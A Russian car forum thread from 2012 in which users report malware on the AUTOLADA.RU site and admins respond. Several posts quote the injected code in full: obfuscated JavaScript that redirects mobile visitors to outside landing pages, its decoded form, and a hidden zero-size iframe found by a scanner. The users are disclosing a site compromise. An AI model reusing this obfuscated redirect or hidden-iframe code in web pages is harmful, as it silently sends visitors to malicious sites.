На сайте вирус [Печать]
Выбрать сообщения с # по # FAQ
AUTOLADA.RU -> Вопросы к администрации проекта LADAONLINE |

#26:  Автор: NskОткуда: Новосибирск СообщениеДобавлено: 05 Июня 2012 12:01
ZF_Turbo
Касперыч всё равно ругается Pardon

#27:  Автор: ZF_Turbo СообщениеДобавлено: 05 Июня 2012 12:12
Всем у кого ещё ругается обновите кэш - Ctrl + F5
#28:  Автор: GarrisonОткуда: Москва СообщениеДобавлено: 14 Июня 2012 08:46
Снова вирус, снова каспер сечёт.
Судя по всему, в одном из рекламных баннеров.

#29:  Автор: ZF_Turbo СообщениеДобавлено: 14 Июня 2012 13:07
Garrison
Снова почистили...

#30:  Автор: Angelier®Откуда: Москва, ЮАО, Чертаново Южное. Днепропетровская область (набегами). СообщениеДобавлено: 21 Июля 2012 02:45
Админы, проверьте код на главной странице

<span class="genmed">Дискуссионный клуб.
Ведущий - ветеран Ваза, один из основателей проекта LADAONLINE Юрий Кузьмич Целиков



<script type="text/javascript">document.write(unescape("%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%76%61%72%20%69%73%6D%6F%62%69%6C%65%3D%6E%61%76%69%67%61%74%6F%72%2E%75%73%65%72%41%67%65%6E%74%2E%6D%61%74%63%68%28%2F%28%61%6E%64%72%6F%69%64%29%2F%69%29%3B%0A%69%66%20%28%69%73%6D%6F%62%69%6C%65%29%0A%7B%0A%09%64%6F%63%75%6D%65%6E%74%2E%6C%6F%63%61%74%69%6F%6E%2E%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%77%61%70%6C%79%2E%72%75%2F%6C%61%6E%64%2E%70%68%70%3F%73%3D%32%35%36%33%26%61%3D%61%74%64%73%26%6C%3D%61%6F%73%5B%32%38%2C%35%35%2C%34%34%2C%34%30%2C%33%32%2C%35%36%5D%22%3B%0A%7D%3B%3C%2F%73%63%72%69%70%74%3E"));</script><br />
</span><span class="gensmall">Модераторы <noindex><a rel="nofollow" href="profile.php?mode=viewprofile&amp;u=20104">Lednik</a></noindex>, <noindex><a rel="nofollow" href="profile.php?mode=viewprofile&amp;u=67698">Kuzmich2</a></noindex>, <noindex><a rel="nofollow" href="profile.php?mode=viewprofile&amp;u=72872">Thomas</a></noindex></span></td>


UPD

Раскодировал:

Код:

<script type="text/javascript">document.write(unescape("<script type="text/javascript">var ismobile=navigator.userAgent.match(/(android)/i):
if (ismobile)
{
   document.location.href="http://waply.ru/land.php?s=2563&a=atds&l=aos[28,55,44,40,32,56]";
};
</script>
));
</script>


#31:  Автор: ZF_Turbo СообщениеДобавлено: 21 Июля 2012 10:27
Angelier®
Спасибо, пофиксили.

#32:  Автор: Angelier®Откуда: Москва, ЮАО, Чертаново Южное. Днепропетровская область (набегами). СообщениеДобавлено: 23 Июля 2012 22:38
Админы, не спим!!!!!
Главная:
Код:

<script type="text/javascript">document.write(unescape("<script type="text/javascript">var ismobile=navigator.userAgent.match(/(acs)|(alav)|(alca)|(amoi)|(audi)|(aste)|(avan)|(benq)|(bird)|(blac)|(blaz)|(brew)|(cell)|(cldc)|(cmd-)|(dang)|(doco)|(eric)|(hipt)|(inno)|(ipaq)|(java)|(jigs)|(kddi)|(keji)|(leno)|(lg-c)|(lg-d)|(lg-g)|(lge-)|(maui)|(maxo)|(midp)|(mits)|(mmef)|(mobi)|(mot-)|(moto)|(mwbp)|(nec-)|(newt)|(noki)|(opwv)|(palm)|(pana)|(pant)|(pdxg)|(phil)|(play)|(pluc)|(port)|(prox)|(qtek)|(qwap)|(sage)|(sams)|(sany)|(sch-)|(sec-)|(send)|(seri)|(sgh-)|(shar)|(sie-)|(siem)|(smal)|(smar)|(sony)|(sph-)|(symb)|(t-mo)|(teli)|(tim-)|(tosh)|(tsm-)|(upg1)|(upsi)|(vk-v)|(voda)|(w3cs)|(wap-)|(wapa)|(wapi)|(wapp)|(wapr)|(webc)|(winw)|(winw)|(xda)|(xda-)|(up.browser)|(up.link)|(windows.ce)|(iemobile)|(mini)|(mmp)|(symbian)|(midp)|(wap)|(phone)|(pocket)|(mobile)|(android)|(pda)|(PPC)|(Series60)|(Opera.Mini)|(ipad)|(iphone)/i);
var not4=navigator.userAgent.match(/(android)/i);
if (ismobile&&!not4)
{
   document.location.href="http://mobi-co.in/land.php?s=2515&a=atds&l=ios[47,49,50,32,41,13,56]oos[56,31,55]";
};</script>"));</script><br />



Сам скрипт, для наглядности:
Код:

<td class="row1" width="100%" height="50"><span class="forumlink"> <a href="viewforum.php?f=31" class="forumlink">Ветеран ВАЗа отвечает ФОРУМЧАНАМ</a><br />
     </span> <span class="genmed">Дискуссионный клуб.
Ведущий - ветеран Ваза, один из основателей проекта LADAONLINE Юрий Кузьмич Целиков<script type="text/javascript">document.write(unescape("%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%76%61%72%20%69%73%6D%6F%62%69%6C%65%3D%6E%61%76%69%67%61%74%6F%72%2E%75%73%65%72%41%67%65%6E%74%2E%6D%61%74%63%68%28%2F%28%61%63%73%29%7C%28%61%6C%61%76%29%7C%28%61%6C%63%61%29%7C%28%61%6D%6F%69%29%7C%28%61%75%64%69%29%7C%28%61%73%74%65%29%7C%28%61%76%61%6E%29%7C%28%62%65%6E%71%29%7C%28%62%69%72%64%29%7C%28%62%6C%61%63%29%7C%28%62%6C%61%7A%29%7C%28%62%72%65%77%29%7C%28%63%65%6C%6C%29%7C%28%63%6C%64%63%29%7C%28%63%6D%64%2D%29%7C%28%64%61%6E%67%29%7C%28%64%6F%63%6F%29%7C%28%65%72%69%63%29%7C%28%68%69%70%74%29%7C%28%69%6E%6E%6F%29%7C%28%69%70%61%71%29%7C%28%6A%61%76%61%29%7C%28%6A%69%67%73%29%7C%28%6B%64%64%69%29%7C%28%6B%65%6A%69%29%7C%28%6C%65%6E%6F%29%7C%28%6C%67%2D%63%29%7C%28%6C%67%2D%64%29%7C%28%6C%67%2D%67%29%7C%28%6C%67%65%2D%29%7C%28%6D%61%75%69%29%7C%28%6D%61%78%6F%29%7C%28%6D%69%64%70%29%7C%28%6D%69%74%73%29%7C%28%6D%6D%65%66%29%7C%28%6D%6F%62%69%29%7C%28%6D%6F%74%2D%29%7C%28%6D%6F%74%6F%29%7C%28%6D%77%62%70%29%7C%28%6E%65%63%2D%29%7C%28%6E%65%77%74%29%7C%28%6E%6F%6B%69%29%7C%28%6F%70%77%76%29%7C%28%70%61%6C%6D%29%7C%28%70%61%6E%61%29%7C%28%70%61%6E%74%29%7C%28%70%64%78%67%29%7C%28%70%68%69%6C%29%7C%28%70%6C%61%79%29%7C%28%70%6C%75%63%29%7C%28%70%6F%72%74%29%7C%28%70%72%6F%78%29%7C%28%71%74%65%6B%29%7C%28%71%77%61%70%29%7C%28%73%61%67%65%29%7C%28%73%61%6D%73%29%7C%28%73%61%6E%79%29%7C%28%73%63%68%2D%29%7C%28%73%65%63%2D%29%7C%28%73%65%6E%64%29%7C%28%73%65%72%69%29%7C%28%73%67%68%2D%29%7C%28%73%68%61%72%29%7C%28%73%69%65%2D%29%7C%28%73%69%65%6D%29%7C%28%73%6D%61%6C%29%7C%28%73%6D%61%72%29%7C%28%73%6F%6E%79%29%7C%28%73%70%68%2D%29%7C%28%73%79%6D%62%29%7C%28%74%2D%6D%6F%29%7C%28%74%65%6C%69%29%7C%28%74%69%6D%2D%29%7C%28%74%6F%73%68%29%7C%28%74%73%6D%2D%29%7C%28%75%70%67%31%29%7C%28%75%70%73%69%29%7C%28%76%6B%2D%76%29%7C%28%76%6F%64%61%29%7C%28%77%33%63%73%29%7C%28%77%61%70%2D%29%7C%28%77%61%70%61%29%7C%28%77%61%70%69%29%7C%28%77%61%70%70%29%7C%28%77%61%70%72%29%7C%28%77%65%62%63%29%7C%28%77%69%6E%77%29%7C%28%77%69%6E%77%29%7C%28%78%64%61%29%7C%28%78%64%61%2D%29%7C%28%75%70%2E%62%72%6F%77%73%65%72%29%7C%28%75%70%2E%6C%69%6E%6B%29%7C%28%77%69%6E%64%6F%77%73%2E%63%65%29%7C%28%69%65%6D%6F%62%69%6C%65%29%7C%28%6D%69%6E%69%29%7C%28%6D%6D%70%29%7C%28%73%79%6D%62%69%61%6E%29%7C%28%6D%69%64%70%29%7C%28%77%61%70%29%7C%28%70%68%6F%6E%65%29%7C%28%70%6F%63%6B%65%74%29%7C%28%6D%6F%62%69%6C%65%29%7C%28%61%6E%64%72%6F%69%64%29%7C%28%70%64%61%29%7C%28%50%50%43%29%7C%28%53%65%72%69%65%73%36%30%29%7C%28%4F%70%65%72%61%2E%4D%69%6E%69%29%7C%28%69%70%61%64%29%7C%28%69%70%68%6F%6E%65%29%2F%69%29%3B%0A%76%61%72%20%6E%6F%74%34%3D%6E%61%76%69%67%61%74%6F%72%2E%75%73%65%72%41%67%65%6E%74%2E%6D%61%74%63%68%28%2F%28%61%6E%64%72%6F%69%64%29%2F%69%29%3B%0A%69%66%20%28%69%73%6D%6F%62%69%6C%65%26%26%21%6E%6F%74%34%29%0A%7B%0A%09%64%6F%63%75%6D%65%6E%74%2E%6C%6F%63%61%74%69%6F%6E%2E%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6D%6F%62%69%2D%63%6F%2E%69%6E%2F%6C%61%6E%64%2E%70%68%70%3F%73%3D%32%35%31%35%26%61%3D%61%74%64%73%26%6C%3D%69%6F%73%5B%34%37%2C%34%39%2C%35%30%2C%33%32%2C%34%31%2C%31%33%2C%35%36%5D%6F%6F%73%5B%35%36%2C%33%31%2C%35%35%5D%22%3B%0A%7D%3B%3C%2F%73%63%72%69%70%74%3E"));</script><br />
     </span><span class="gensmall">Модераторы <noindex><a rel="nofollow" href="profile.php?mode=viewprofile&amp;u=20104">Lednik</a></noindex>, <noindex><a rel="nofollow" href="profile.php?mode=viewprofile&amp;u=67698">Kuzmich2</a></noindex>, <noindex><a rel="nofollow" href="profile.php?mode=viewprofile&amp;u=72872">Thomas</a></noindex></span></td>



Ищите дырку, или на FTP пароль разнюхали, или SQL инжекцию делают (что скорей)

#33:  Автор: Вадя™Откуда: Москва, СЗАО СообщениеДобавлено: 24 Июля 2012 09:07
спасибо, разберемся
#34:  Автор: SuseОткуда: Местный я... СообщениеДобавлено: 25 Июля 2012 08:03
Проверка сайта http://autolada.ru/

Дата проверки: 25/07/2012 07:58:44

Тип проверки: полная (antivirus-alarm + мировые антивирусные базы)

Список проверяемых файлов:

1. http://autolada.ru/, тип файла: html
• очень подозрительный код, скорее всего вирус:

<iframe src="http://tdass.16mb.com/main.php?site=9" width="0" height="0" frameborder="0"></iframe>

• содержит сомнительную ссылку по версии гугла: www.liveinternet.ru
2. http://autolada.ru/templates/main.js, тип файла: javascript

3. http://autolada.ru/templates/swfobject.js, тип файла: javascript

4. http://ladaonline.ru/jsout.php, тип файла: javascript

5. http://pic-bash.ru/jsout.php?num=4, тип файла: javascript

6. http://autolada.ru/templates/apgt.js, тип файла: javascript

7. http://tdass.16mb.com/main.php?site=9, тип файла: iframe html
• содержит сомнительную ссылку по версии гугла: www.liveinternet.ru

• Почему гугл считает сомнительным даже самого себя, читайте в нашей статье на krwork.ru »

#35:  Автор: LTОткуда: Kazakhstan СообщениеДобавлено: 25 Июля 2012 08:15
Что случилось? Пропадают сообщения. Т.е. как бы они есть, но по факту они пустые.
#36:  Автор: SuseОткуда: Местный я... СообщениеДобавлено: 25 Июля 2012 08:25
+1
#37:  Автор: nestorОткуда: ОМСК СообщениеДобавлено: 25 Июля 2012 08:44
+2.
#38:  Автор: Kirill111Откуда: Замкадыш СообщениеДобавлено: 25 Июля 2012 09:32
Пропадает всякое желание что-либо писать на такой замечательный форум, который раз в неделю откатывается на пару дней назад и трет все написанное. Курилка кер бы с ней, но люди пишут отчеты в профильных, стараются, тратят свое время, а из-за чьих-то кривых лап или невозможности сделать нормальную защиту все нафиг пропадает с завидной регулярностью. Один раз человек стерпит, два, а потом перестанет сюда писать что-либо объемное и полезное, в сети куча сайтов с менее криворукими админами. facepalm

Бэкап не делается элементарный пару раз в сутки? Откатить есть возможность не на два дня, а поближе? У меня например пропало несколько постов, на написание которых я вчера потратил минут 30 времени. facepalm

#39:  Автор: ZF_Turbo СообщениеДобавлено: 25 Июля 2012 09:55
Ничего не пропадает, это проблема после падания сервера. Все сообщения вернутся на место, после запуска проверки базы данных. Как будто первый раз прям.
#40:  Автор: realistОткуда: Москва СообщениеДобавлено: 25 Июля 2012 10:49
минут 5 назад:


Ошибка сервера
На веб-сайте произошла ошибка при получении http://autolada.ru/. Веб-сайт может быть закрыт на обслуживание или настроен неправильно.
Вот несколько советов и рекомендаций:
Обновите эту страницу позже.
Ошибка HTTP 500 (Internal Server Error): При попытке сервера выполнить запрос возникла неожиданная ситуация.

(многократно)

#41:  Автор: realistОткуда: Москва СообщениеДобавлено: 25 Июля 2012 11:22
снова многократные 500-ые ошибки. Товарищи, что с форумом?
#42:  Автор: ZF_Turbo СообщениеДобавлено: 25 Июля 2012 11:31
realist
Что за ошибки? Просто при серфинге?

Ни разу у меня не вылезло.

#43:  Автор: realistОткуда: Москва СообщениеДобавлено: 25 Июля 2012 11:34
ZF_Turbo
да, просто при серфинге. подробная ошибка сверху. 2 раза уже было с утра. просто в определенный момент перестаешь заходишь, получаешь ошибку, минут 5 держится-сколько ни обновляй, потом опять всё ок.

#44:  Автор: ZF_Turbo СообщениеДобавлено: 25 Июля 2012 11:51
Все потерянные сообщения снова видны.

realist
Я правил код сайта немного возможно из-за этого.

#45:  Автор: realistОткуда: Москва СообщениеДобавлено: 25 Июля 2012 12:39
ZF_Turbo
спасибо, ясно!




AUTOLADA.RU -> Вопросы к администрации проекта LADAONLINE |
Страница 2 из 2
Часовой пояс: GMT + 4
AUTOLADA.RU